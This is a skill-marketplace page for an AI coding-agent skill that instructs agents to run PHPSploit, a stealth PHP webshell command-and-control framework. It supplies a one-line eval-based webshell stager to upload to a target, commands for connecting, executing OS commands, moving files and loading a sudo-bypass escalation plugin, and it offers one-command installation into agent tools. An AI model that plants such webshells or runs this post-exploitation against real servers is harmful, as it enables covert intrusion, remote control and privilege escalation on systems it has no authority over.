aeondave/phpsploit
offensive-tools/c2/phpsploit/SKILL.md
Stealth post-exploitation framework operating via HTTP headers inside a webshell. Use when you have a PHP webshell on target and need an interactive shell, file ops, and plugin-based post-exploitation over HTTP.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill phpsploitInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Mar 31, 2026, 8:59 PM58.0s1 file scanned
SKILL.md
- name:
- phpsploit
- description:
- Stealth post-exploitation framework operating via HTTP headers inside a webshell. Use when you have a PHP webshell on target and need an interactive shell, file ops, and plugin-based post-exploitation over HTTP.
- license:
- MIT
- compatibility:
- Python 3; pip install phpsploit; Linux/macOS; github.com/nil0x42/phpsploit
- author:
- AeonDave
- version:
- 1.0
PHPSploit
Stealth PHP webshell framework — full interactive session tunneled in HTTP headers.
Quick Start
pip install phpsploit
phpsploit
# Set target and connect
set TARGET http://target.com/shell.php
set PASSKEY MySecret
exploit
Core Commands
| Command | Purpose |
|---------|---------|
| set TARGET <url> | Webshell URL |
| set PASSKEY <key> | Obfuscation passkey |
| exploit | Connect to shell |
| ls, cd, cat | File system ops |
| upload <local> <remote> | Upload file |
| download <remote> | Download file |
| run <cmd> | Execute OS command |
| load <plugin> | Load plugin |
Webshell Setup
Minimal PHP stager (upload to target):
<?php @eval(base64_decode($_SERVER['HTTP_X_PAYLOAD']));
Common Workflows
Post-exploitation after file upload vuln:
set TARGET http://target.com/uploads/shell.php
exploit
run whoami
Escalate with plugin:
load post/exploit/sudo-bypass
run
Resources
| File | When to load |
|------|--------------|
| references/ | Webshell variants and plugin list |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026